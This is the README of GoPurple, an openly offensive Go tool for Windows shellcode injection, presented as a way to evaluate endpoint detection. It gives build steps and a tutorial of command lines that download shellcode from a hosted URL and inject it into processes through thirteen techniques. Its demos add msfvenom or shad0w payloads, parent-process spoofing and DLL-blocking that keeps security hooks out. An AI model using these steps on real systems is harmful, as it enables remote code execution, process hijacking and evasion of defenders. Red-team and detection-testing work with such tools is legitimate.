GoPurple
This project is a simple collection of various shellcode injection techniques, aiming to streamline the process of endpoint detection evaluation, besides challenging myself to get into the Golang world.
Install
Requires go installed on a windows machine.
git clone https://github.com/sh4hin/GoPurple.git
cd GoPurple
go build gopurple.go
Use
_____ _
/ ____| | |
| | __ ___ _ __ _ _ _ __ _ __ | | ___
| | |_ |/ _ \| '_ \| | | | '__| '_ \| |/ _ \
| |__| | (_) | |_) | |_| | | | |_) | | __/
\_____|\___/| .__/ \__,_|_| | .__/|_|\___|
| | | |
|_| |_| by @s3cdev
-a string
Program command line arguments
-b string
block DLL mode (nonms/onlystore for QueueUserAPC )
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreatetThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWaitpool
13: BananaPhone
-u string
URL hosting the shellcode
Tutorial
1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)
2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)
3 - gopurple.exe -u urlhostingpayload -t 3 (CreatetThreadNative)
4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)
5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)
6 - gopurple.exe -u urlhostingpayload -t 6 -p tagetprocess (CreateRemoteThread)
7 - gopurple.exe -u urlhostingpayload -t 7 -p tagetprocess (RtlCreateUserThread)
8 - gopurple.exe -u urlhostingpayload -t 8 //(CreateThread)
9 - gopurple.exe -u urlhostingpayload -t 9 -p tagetprocess (CreateRemoteThreadNative)
10 - gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process) (CreateProcessWithPipe)
11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore) (QueueUserAPC)
nonms = only DLLs that are signed by Microsoft can hook into the process
onlystore = only Microsoft store application's process can hook into the process
12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWaitpool)
13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)
Demo
A shellcode needs to be generated, this can be done using tools such as msfvenom or shad0w. Then the shellcode needs to be hosted to be remotely downloaded and executed on the remote machine. For the sake of clarity, the below demos illustrate different ways of using the tool.
1 – Shellcode injection using BananaPhone method + Shad0w as the shellcode generator
2 – Shellcode injection using QueueUserAPC technique + Shad0w as the shellcode generator + spoofing the parent ID (explorer as the parent ID) + process launching by a spoofed parent that contains the shellcode(calc) + protecting the process from unsigned DLL hook, so only Microsoft signed DLL can hook into the process.
3- Shellcode injection using CreateFiber + msfvenom as the shellcode generator
Legal Disclaimer
This project is made for educational and ethical testing purposes only. Usage of GoPurple for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developer assumes no liability and are not responsible for any misuse or damage caused by this program
Source: https://github.com/sh4hin/
